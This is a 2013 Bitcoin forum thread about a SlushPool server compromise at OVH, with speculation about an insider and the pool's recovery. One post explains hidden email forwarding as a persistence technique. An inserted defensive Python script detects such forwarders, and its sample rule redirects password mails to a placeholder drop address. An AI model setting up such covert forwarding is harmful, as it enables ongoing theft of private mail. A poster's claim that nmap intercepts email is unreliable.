Bitcoin Forum
Poll
Question: What type of pool payouts do you prefer?
Bitcoins - 3151 (80.4%)
Bank transfer / USD - 407 (10.4%)
Gold/silver coins and bars - 359 (9.2%)
Total Voters: 3915

Author Topic: [40+ PH] SlushPool (slushpool.com); World's First Mining Pool  (Read 3853847 times)
paraipan
Legendary
*
Offline Offline

Activity: 924


Firstbits: 1pirata


View Profile WWW
April 23, 2013, 11:38:50 PM
 #6641

Damn!! To me it sounds like an override of OVH password manager.... I hope you find out how they did. And I'm impressed by your response time on this hack.

And you sound like the hacker if you ask me...  Roll Eyes



Hope is all well Slush!

BTCitcoin: An Idea Worth Saving - Q&A with bitcoins on rugatu.com - Check my rep
Trance104
Full Member
***
Offline Offline

Activity: 199


View Profile WWW
April 23, 2013, 11:40:14 PM
 #6642

I'm not able to mine currently.. Even though the site says I can. :-(

Can't stop the Trance! Dance!! DANCE!!!
www.youtube.com/pixelfixgaming
ZephramC
Sr. Member
****
Offline Offline

Activity: 475



View Profile
April 23, 2013, 11:44:01 PM
 #6643

Very impressive response! I hope things will settle soon. OVH has probably some explaining to do.
PuertoLibre
Legendary
*
Offline Offline

Activity: 1064


Master BFL Shill


View Profile
April 23, 2013, 11:44:38 PM
 #6644

So none of our earned bitcoins will be lost?

Ack.
It is an old hack that might be worth checking in your mail options. You might want to consider checking your inbox for any Forwarders. There is a way in most email systems for people to forward mail received in an account to another destination. The original mail still remains at the account but duplicates are normally forwarded to a second destination. The forwarding process is usually not obvious until you inspect your settings carefully.

This kind of hack means that you only need to compromise the account once, as once the forwarding is set, the account continues to transparently duplicate and forward the new mail to a second destination. Does not matter if you regain control of the account. It also does not require a person to check the content of the inbox as they get a copy at their forwarded address (so the original inbox remains untouched).

You should also contact the folks at your various providers to let them know that you want a stricter security check on each of your accounts. It will require more checks before you can do anything on the phone but it will preempt (or make very difficult) any forms of social engineering to gain access to your account.
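
A defender's check for the hidden-forwarder persistence described in the post above, added here as an example and not part of the original thread: it scans a Sieve script and a `.forward` file for redirects to addresses outside your own domains. The function names, sample inputs and domains are constructed for illustration; the thread does not say which mail system was involved.

```python
import re
from typing import NamedTuple

class Forward(NamedTuple):
    source: str        # "sieve" or "dot-forward"
    destination: str   # external address that receives the mail
    keeps_copy: bool   # Sieve ":copy" tag / .forward "\user": inbox still gets it

# redirect [":tag" ...] "address";  (RFC 5228, ":copy" from RFC 3894)
SIEVE_REDIRECT = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"\s*;', re.I)

def _external(addr, local_domains):
    return "@" in addr and addr.rpartition("@")[2].lower() not in local_domains

def audit_sieve(script, local_domains):
    # Simplified comment stripping so commented-out rules are not reported.
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.S)
    script = re.sub(r"#.*", "", script)
    return [Forward("sieve", addr, ":copy" in tags.lower())
            for tags, addr in SIEVE_REDIRECT.findall(script)
            if _external(addr, local_domains)]

def audit_dot_forward(text, local_domains):
    entries = [e.strip().strip('"') for e in re.split(r"[,\n]", text)]
    entries = [e for e in entries if e and not e.startswith("#")]
    keeps = any(e.startswith("\\") for e in entries)   # "\user" = local delivery
    # Skip local deliveries, pipes to programs and file paths; report the rest.
    return [Forward("dot-forward", e, keeps) for e in entries
            if not e.startswith(("\\", "|", "/")) and _external(e, local_domains)]

# Constructed sample inputs (not taken from the thread).
LOCAL_DOMAINS = {"pool.example"}
SAMPLE_SIEVE = '''
require ["copy"];
# redirect "old@elsewhere.example";
if header :contains "subject" "password" {
    redirect :copy "drop@mailbox.example";
}
redirect "ops@pool.example";
'''
SAMPLE_FORWARD = "\\admin, collector@mailbox.example\n"

if __name__ == "__main__":
    findings = (audit_sieve(SAMPLE_SIEVE, LOCAL_DOMAINS)
                + audit_dot_forward(SAMPLE_FORWARD, LOCAL_DOMAINS))
    for f in findings:
        print(f"{f.source}: forwards to {f.destination} (keeps copy: {f.keeps_copy})")
```

Webmail filter rules and provider-side forwarding settings are stored elsewhere and need their own review.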
camaro69327
Jr. Member
*
Offline Offline

Activity: 59



View Profile
April 23, 2013, 11:56:04 PM
 #6645

why they will hack slush pool especially???

I think because this was, similarly to Linode issue, an inside job. I don't have any indications that other bitcoin-related servers at OVH have been hacked as well (yet), but the scenario how all this happened indicates that somebody has been able to get password recovery email somehow. And what's the salary of administrator of OVH mailing server?

Wow...Is it time to get Authorities involved? OR have you already ?

...As always Great job and way to stay on top of things.

BTC : 1CcWoADqDtn5R1uL2TmTFw8CFtvLCqeW2j
TiborB
Member
**
Offline Offline

Activity: 83


View Profile
April 24, 2013, 12:00:55 AM
 #6646

Stratum is back, great job!

Cheers,
   T
dellnull
Jr. Member
*
Offline Offline

Activity: 30


View Profile
April 24, 2013, 12:05:00 AM
 #6647

Damn!! To me it sounds like an override of OVH password manager.... I hope you find out how they did. And I'm impressed by your response time on this hack.

And you sound like the hacker if you ask me...  Roll Eyes



Hope is all well Slush!

I'm taking that as a compliment, but I can assure you that I don't bite the one who feeds me.
phazedoubt
Newbie
*
Offline Offline

Activity: 18


People are my business


View Profile
April 24, 2013, 12:05:05 AM
 #6648

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.  More likely though, is the human element, an administrator paid to set things up.  Systems are usually surprisingly secure.  Almost every successful attack i see involves phishing or an inside job.  Just as an fyi though, nmap is a powerful tool, and anyone can intercept and reconstruct any email that is sent over the internet if it is not pgp encrypted.  i've done this for more than one client to prove the point.

It ALL comes back around...
laughingbear
Deflationary champion
Hero Member
*****
Offline Offline

Activity: 631


www.cryptobetfair.com


View Profile WWW
April 24, 2013, 12:05:24 AM
 #6649

Stratum is back, great job!

Cheers,
   T

Way to never read anything before making your post... keep living the dream.  I know you will never read this
slush
Legendary
*
Offline Offline

Activity: 1358



View Profile WWW
April 24, 2013, 12:07:29 AM
 #6650

I set up Stratum mining to not waste hashrate on the pool. However I didn't fix the hole because I think that the hole is OVH itself, so it's clearly possible that attackers shut down the pool again. I'll migrate out of OVH ASAP.

slush
Legendary
*
Offline Offline

Activity: 1358



View Profile WWW
April 24, 2013, 12:08:43 AM
 #6651

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.

I cross-checked my mailbox setup and no forwarding is configured here. For now I fully blame OVH for this issue.

TiborB
Member
**
Offline Offline

Activity: 83


View Profile
April 24, 2013, 12:10:36 AM
 #6652

Stratum is back, great job!

Cheers,
   T

Way to never read anything before making your post... keep living the dream.  I know you will never read this

Can you please shed some light on this comment?
laughingbear
Deflationary champion
Hero Member
*****
Offline Offline

Activity: 631


www.cryptobetfair.com


View Profile WWW
April 24, 2013, 12:13:46 AM
 #6653

Stratum is back, great job!

Cheers,
   T

Way to never read anything before making your post... keep living the dream.  I know you will never read this

Can you please shed some light on this comment?

I doubt it
gbx
Full Member
***
Offline Offline

Activity: 219


View Profile
April 24, 2013, 12:16:56 AM
 #6654

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.

I cross-checked my mailbox setup and no forwarding is configured here. For now I fully blame OVH for this issue.

Interesting analysis.  Is it possible that the algo for the OTP is "known" ?  So the attacker would simply have to know what the next OTP password is once it's been submitted?
slush
Legendary
*
Offline Offline

Activity: 1358



View Profile WWW
April 24, 2013, 12:18:13 AM
 #6655

Pool just found new block. Because database isn't running and shares are not stored, I'll spread blocks mined during database outage to miners who'll continue mining on the pool since the database will be up again.

TiborB
Member
**
Offline Offline

Activity: 83


View Profile
April 24, 2013, 12:19:27 AM
 #6656

Stratum is back, great job!

Cheers,
   T

Way to never read anything before making your post... keep living the dream.  I know you will never read this

Can you please shed some light on this comment?

I doubt it

If I agreed with you, we both would be wrong. Never mind, no offence taken on my side whatsoever.
TiborB
Member
**
Offline Offline

Activity: 83


View Profile
April 24, 2013, 12:21:48 AM
 #6657

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.

I cross-checked my mailbox setup and no forwarding is configured here. For now I fully blame OVH for this issue.

Interesting analysis.  Is it possible that the algo for the OTP is "known" ?  So the attacker would simply have to know what the next OTP password is once it's been submitted?

I'd guess he is using a vasco or rsa token with appropriate key size...
Lucko
Hero Member
*****
Offline Offline

Activity: 714



View Profile
April 24, 2013, 12:26:26 AM
 #6658

Pool just found new block. Because database isn't running and shares are not stored, I'll spread blocks mined during database outage to miners who'll continue mining on the pool since the database will be up again.

We are mining again? You told us tomorrow... Well I guess today morning but because I read tomorrow I removed your pool from config because I thought the stratum might come up hacked... I'm adding them again but for the last block you might use data that you have... It was a long one and I would hate to be losing everything because of that...
slush
Legendary
*
Offline Offline

Activity: 1358



View Profile WWW
April 24, 2013, 12:27:58 AM
 #6659

For now it is mining on OVH machine, but now I'm migrating DNS to EC2 machines, which are trusted.

phazedoubt
Newbie
*
Offline Offline

Activity: 18


People are my business


View Profile
April 24, 2013, 12:29:17 AM
 #6660

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.

I cross-checked my mailbox setup and no forwarding is configured here. For now I fully blame OVH for this issue.

Interesting analysis.  Is it possible that the algo for the OTP is "known" ?  So the attacker would simply have to know what the next OTP password is once it's been submitted?

I'd guess he is using a vasco or rsa token with appropriate key size...

Nothing so elaborate.  You'd be amazed at the power that an administrator can wield.  Your server security is only as strong as those that have physical access to them honoring their word.  Occam's razor applies greatly when it comes to hacking.

It ALL comes back around...